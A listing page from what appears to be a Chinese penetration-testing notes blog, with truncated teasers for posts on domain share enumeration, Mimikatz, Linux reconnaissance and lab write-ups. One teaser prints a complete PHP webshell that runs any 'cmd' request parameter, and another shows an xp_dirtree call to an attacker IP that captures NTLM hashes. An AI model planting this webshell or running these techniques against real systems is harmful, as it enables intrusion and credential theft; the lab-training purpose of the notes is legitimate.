最新发布第9页
枚举域共享-白鸢的笔记

枚举域共享

我 们 将 使 用 PowerView 的 Find-DomainShare 功 能 来 查 找 域 中 的 共 享 。 我 们 还 可 以 添 加 -CheckShareAccess 标志来显示仅供我们使用的共享。但是,我们现在将跳过此标志以返回...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07312
Linux查看网卡信息及查看是否有其他用户与系统进行通讯-白鸢的笔记

Linux查看网卡信息及查看是否有其他用户与系统进行通讯

查看网卡信息有几块网卡,这些网卡所连接的网络。以这台主机为pivot(枢钮)进而去打进(入侵)内网(其他网络)命令:/sbin/ifconfig -a-a查看所有的网络连接(包括非活动的)网卡相关的配置文...
简单php木马-白鸢的笔记

简单php木马

simple-backdoor.php<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; } ?>使用方法:Usage: http://target...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0726
Mimikatz简单使用-白鸢的笔记

Mimikatz简单使用

1. Mimikatz介绍作者:Benjamin DelpyBeniamin Delpy最初创建 Mimikatz是为了向微软证明其身份验证协议容易受到攻击然而,这个工具在20之后仍然被广泛用于网络安全行业这个工具也是世界上最好的...
Windows服务管理 sc-白鸢的笔记

Windows服务管理 sc

Windows系统中的服务就像Linux系统中的守护进程。它们在后台运行任务,大多数情况下,它们使用SYSTEM特权执行(为我们提供了另一种实现系统shell的方法)。 1.对服务的管理scsc qc [service na...
Chatterbox AChat System http服务攻击-白鸢的笔记

Chatterbox AChat System http服务攻击

简介ChatterboxDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.74 Windows 1. 信息收集9225和9226都是开启的 且是AChat System http服务 2. 漏洞挖掘与利用访问9255...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07110
Granny   WebDAV文件上传漏洞 churrasco权限提升-白鸢的笔记

Granny WebDAV文件上传漏洞 churrasco权限提升

简介GrannyDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.15 Windows 1. 信息收集收集受害者服务详情nmap -p- -T5 -n -vvv -oA Granny -noscript 10.10.10.15IIS 6.0...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07112
PC-白鸢的笔记

PC

简介point 10PCDifficulty INTERMEDIATErated by community INTERMEDIAT 实验环境攻击者 Kali 192.168.45.206受害者 IP 192.168.169.210  Linux 1. 信息收集收集受害者服务详情nmap -sV -A 1...
Medtech 堡垒机 seimpersonateprivilege 提权-白鸢的笔记

Medtech 堡垒机 seimpersonateprivilege 提权

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0718
Linux信息收集-白鸢的笔记

Linux信息收集

1. 查看用户家目录中有没有任何感兴趣的文件 能否访问ls -ahlR /root/ ls -ahlR /home/ -R 递归显示 -h 以可读的方式显示文件大小 Tips: 默认情况下,用户的家目录是位于/home目录下 2. 关于密...